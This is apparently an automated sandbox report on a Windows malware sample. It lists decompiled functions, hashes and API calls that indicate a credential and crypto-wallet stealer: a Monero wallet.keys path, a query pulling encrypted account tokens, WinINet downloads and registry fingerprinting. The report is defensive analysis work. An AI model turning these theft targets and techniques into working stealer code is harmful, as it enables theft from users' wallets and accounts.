                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 7f86f754e6695e3e3502572d9635bbec44ffd8e0d1965a293a861ed07d3d3ef9
                        • Instruction ID: 471b513275363f7fa8598b4554bab3cb73ff2d1b9778dfc91c1e79d85c75d6d4
                        • Opcode Fuzzy Hash: 7f86f754e6695e3e3502572d9635bbec44ffd8e0d1965a293a861ed07d3d3ef9
                        • Instruction Fuzzy Hash: E45194B1900219ABDB24DF90DC55BEE77B8FB44705F108098B605E72C0EB75AA89CF96
                        Function 0086BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        • lstrlen.KERNEL32(00000000), ref: 0086BC9F
                          • Part of subcall function 00878E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00878E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0086BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0086BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0086BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: d76a1ef074b3206d67163e804f61a1371a287304bfb4d00cf1f723d19ed75d1e
                        • Instruction ID: 40549fc10d5a9b829a425be481d2988452bc5b99e8ce1f01c584f300216f03ba
                        • Opcode Fuzzy Hash: d76a1ef074b3206d67163e804f61a1371a287304bfb4d00cf1f723d19ed75d1e
                        • Instruction Fuzzy Hash: DCB120719101089BDB08FBA4CD96EEE7778FF94304F408168F51AE6195EF34AA49CB63
                        Function 00876770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: 8fcbfbe78d110a26ce1f4a233f94558d79fcbe8e10b0c73093e822d4dee9ef34
                        • Instruction ID: 427ce075443cf5f577bd8da5ac43e4d5e403cdfff35231f8c0a8167c6083e6f7
                        • Opcode Fuzzy Hash: 8fcbfbe78d110a26ce1f4a233f94558d79fcbe8e10b0c73093e822d4dee9ef34
                        • Instruction Fuzzy Hash: CEF0173190820AEBD384DFE0E90976D7AB0FB16742F040298E609862D0EB748E52DB96
                        Function 00864FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00864FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00864FD1
                        • InternetOpenA.WININET(00880DDF,00000000,00000000,00000000,00000000), ref: 00864FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00865011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00865041
                        • InternetCloseHandle.WININET(?), ref: 008650B9
                        • InternetCloseHandle.WININET(?), ref: 008650C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 3b4ad94cb333da50c48a3b82d5cb372a7bd6d4b4b28ed8ba0ceec8d17afa7cdc
                        • Instruction ID: 38938619c2dde0c1444c1ae1fe5063a235f151b70273109b65e2fc3a15e0c16c
                        • Opcode Fuzzy Hash: 3b4ad94cb333da50c48a3b82d5cb372a7bd6d4b4b28ed8ba0ceec8d17afa7cdc
                        • Instruction Fuzzy Hash: 8D31F7B4A0021CABDB20CF94DC85BDDB7B4FB48704F1081D9EA09A7281D7746AC6CF99
                        Function 008783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00878426
                        • wsprintfA.USER32 ref: 00878459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0087847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0087848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00878499
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,0116E5A0,00000000,000F003F,?,00000400), ref: 008784EC
                        • lstrlen.KERNEL32(?), ref: 00878501
                        • RegQueryValueExA.ADVAPI32(00000000,0116E510,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00880B34), ref: 00878599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00878608
                        • RegCloseKey.ADVAPI32(00000000), ref: 0087861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 87a3ed7fd3db3d67c4728ef89d74fca5cee598c5fd8816174fdf7663fe7d63f3
                        • Instruction ID: 377dad41c1a58377371d14e5a6856f20fe65e2025f701ed0a5de89e05e004254
                        • Opcode Fuzzy Hash: 87a3ed7fd3db3d67c4728ef89d74fca5cee598c5fd8816174fdf7663fe7d63f3
                        • Instruction Fuzzy Hash: C421197194021CABDB64DB54DC85FE9B3B8FB58700F00C5D8E609A6180DF75AA86CFD5
                        Function 00877690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008776A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 008776AB
                        • RegOpenKeyExA.ADVAPI32(80000002,0115C488,00000000,00020119,00000000), ref: 008776DD
                        • RegQueryValueExA.ADVAPI32(00000000,0116E4F8,00000000,00000000,?,000000FF), ref: 008776FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00877708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: d927d89fb1f848d46695c64e32e0e0e8e55e597ecde787460af8a5763f005c66
                        • Instruction ID: 3a00df890b59a7858298bf83b8a643851a3518af0e6a956075032ff95e96de85
                        • Opcode Fuzzy Hash: d927d89fb1f848d46695c64e32e0e0e8e55e597ecde787460af8a5763f005c66
                        • Instruction Fuzzy Hash: F4014FB5A04209BBDB00DBE4DC49F6AB7F8EB59701F108454FA05D72D4D7749905CB51
                        Function 00877720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877734
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0087773B
                        • RegOpenKeyExA.ADVAPI32(80000002,0115C488,00000000,00020119,008776B9), ref: 0087775B
                        • RegQueryValueExA.ADVAPI32(008776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0087777A
                        • RegCloseKey.ADVAPI32(008776B9), ref: 00877784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: f51d26e14ab6d5622e9c3b9ed06fe6b33b9a379b528313092a39cbe096344f0b
                        • Instruction ID: 240c2edafb444167de0c046604a330662f68a76aa6ce203b33d2c3d8973669b5
                        • Opcode Fuzzy Hash: f51d26e14ab6d5622e9c3b9ed06fe6b33b9a379b528313092a39cbe096344f0b
                        • Instruction Fuzzy Hash: 8D0121B5A40209BBDB00DBE4DC49FAEB7B8EB58701F008158FA05E62C1D7759501CB51
                        Function 008740B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 008740D5
                        • RegOpenKeyExA.ADVAPI32(80000001,0116E218,00000000,00020119,?), ref: 008740F4
                        • RegQueryValueExA.ADVAPI32(?,0116E8D0,00000000,00000000,00000000,000000FF), ref: 00874118
                        • RegCloseKey.ADVAPI32(?), ref: 00874122
                        • lstrcat.KERNEL32(?,00000000), ref: 00874147
                        • lstrcat.KERNEL32(?,0116E678), ref: 0087415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: f75148f5d1b1a8782b2ff64caa948020d7b977e9f090a92b258ac165446beeb9
                        • Instruction ID: 9dbdeb7eab3c445110f3b1fec7bff167be32fbc36beef338d2c35ee914d4a2dd
                        • Opcode Fuzzy Hash: f75148f5d1b1a8782b2ff64caa948020d7b977e9f090a92b258ac165446beeb9
                        • Instruction Fuzzy Hash: 414198B69001086BDB14EBE4DC4AFFE737DF798300F008559B61A96181EB759B89CB93
                        Function 008699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008699EC
                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00869A11
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00869A31
                        • ReadFile.KERNEL32(000000FF,?,00000000,0086148F,00000000), ref: 00869A5A
                        • LocalFree.KERNEL32(0086148F), ref: 00869A90
                        • CloseHandle.KERNEL32(000000FF), ref: 00869A9A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: 160dca0633861f4f777d24018b01d7eca8d07f3d80fe849231a2923827b3d188
                        • Instruction ID: 43335837e85ec93a140194d2c2ad14af2e466c6c0c1983944127e87eb0be55c8
                        • Opcode Fuzzy Hash: 160dca0633861f4f777d24018b01d7eca8d07f3d80fe849231a2923827b3d188
                        • Instruction Fuzzy Hash: EF3105B4A00219EFDB14CF94C885BAE77F9FF49351F108158E912AB2D0D778AA41CFA1
                        Function 0087C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Typememset
                        • String ID:
                        • API String ID: 3530896902-3916222277
                        • Opcode ID: 613a3b139070fe887e89eee1b4f9a1171b735d3505a30b6dd9002210262d6527
                        • Instruction ID: 8a2b94633ac37588947fc81b2d3c1eb2bcb6300a49089fbe0d97d1b6a439c913
                        • Opcode Fuzzy Hash: 613a3b139070fe887e89eee1b4f9a1171b735d3505a30b6dd9002210262d6527
                        • Instruction Fuzzy Hash: E041E77110075C5EDB218B288C84BFB7BE9EF45708F1484ACDA8EC7186D271DA459F61
                        Function 00874780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,0116E828), ref: 008747DB
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00874801
                        • lstrcat.KERNEL32(?,?), ref: 00874820
                        • lstrcat.KERNEL32(?,?), ref: 00874834
                        • lstrcat.KERNEL32(?,0115BDB8), ref: 00874847
                        • lstrcat.KERNEL32(?,?), ref: 0087485B
                        • lstrcat.KERNEL32(?,0116DF98), ref: 0087486F
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
